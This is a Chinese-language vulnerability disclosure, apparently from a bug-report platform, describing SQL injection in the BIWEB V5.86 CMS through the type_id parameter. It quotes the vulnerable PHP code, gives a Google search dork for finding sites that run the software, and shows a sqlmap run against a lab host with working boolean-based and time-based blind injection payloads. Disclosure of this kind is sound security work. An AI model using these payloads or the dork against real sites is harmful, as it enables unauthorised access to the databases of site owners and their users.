### 简要描述:
0.0 新手彩笔第一次么么哒
### 详细说明:
biweb/cases/include/index.inc.php
23行-50行
```
$arrWhere = array();
$arrLink = array();
$arrWhere[] = "pass='1'";
$type_title = '';
if (!empty($_GET['type_id'])) {
$intTypeID = intval($_GET['type_id']);
$type_id = $intTypeID - 1;
$type_title = $arrMType[$type_id]['type_title'];
$objWebInit->fetchAllChildID($_REQUEST['type_id'], $arrMType, $arrChild) ;
$typeStr=implode( $arrChild['type_id'], ',');
$arrWhere[] = "type_id in ( ".$typeStr.")"; // 直接进来了
$arrLink[] = "type_id=".$intTypeID;
}
if(!empty($arrMType)){
foreach($arrMType as $k => $v){
if($v['type_id'] == intval($_GET['type_id'])){
$arrMOutput["smarty_assign"]['strTypeTitle'] = $v['type_title'];
break;
}
}
}
$strWhere = implode(' AND ',$arrWhere);
$strWhere = 'where '.$strWhere;
$arrInfoList = $objWebInit->getInfoList($strWhere,' ORDER BY topflag DESC,submit_date DESC',($intPage-1)*$arrGPage['page_size'],$arrGPage['page_size'],'id,type_id,title,submit_date,bedeck,summary,thumbnail'); // strWhere直接进入sql语句
```
看SQL监控,正常执行:
[<img src="https://images.seebug.org/upload/201410/161827046c255da2cd65f86106ee516b463d9a55.png" alt="正常语句.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/161827046c255da2cd65f86106ee516b463d9a55.png)
单引号报错!
[<img src="https://images.seebug.org/upload/201410/16182844ff49971f9023cfbb28408386d6b572be.png" alt="单引号报错.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/16182844ff49971f9023cfbb28408386d6b572be.png)
提交的SQL语句:
[<img src="https://images.seebug.org/upload/201410/1618294661d68e854e195a579cffbfd60097c69e.png" alt="错误执行.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/1618294661d68e854e195a579cffbfd60097c69e.png)
### 漏洞证明:
Google一下https://www.google.com/search?q=intext%3APowered+by+BIWEB+V5.86&hl=zh-CN&gbv=2&oq=&gs_l=
[<img src="https://images.seebug.org/upload/201410/16204205b3c82b1dacf2385abd3c98ef133315ca.png" alt="Google.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/16204205b3c82b1dacf2385abd3c98ef133315ca.png)
默认的URL丢sqlmap会出错,简单处理一下还原URL:/cases/index.php/type_id-0.html = /cases/index.php?type_id=0
```
root@kali:~# sqlmap -u "http://192.168.73.132/biweb/cases/index.php?type_id=0" -v 1 --level 5 --risk 3
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:02:48
[10:02:48] [INFO] resuming back-end DBMS 'mysql'
[10:02:48] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: type_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type_id=1) AND 1919=1919 AND (4105=4105
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: type_id=1) AND SLEEP(5) AND (4408=4408
---
[10:02:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[10:02:48] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.73.132'
```
京公网安备 11010502034610号
暂无评论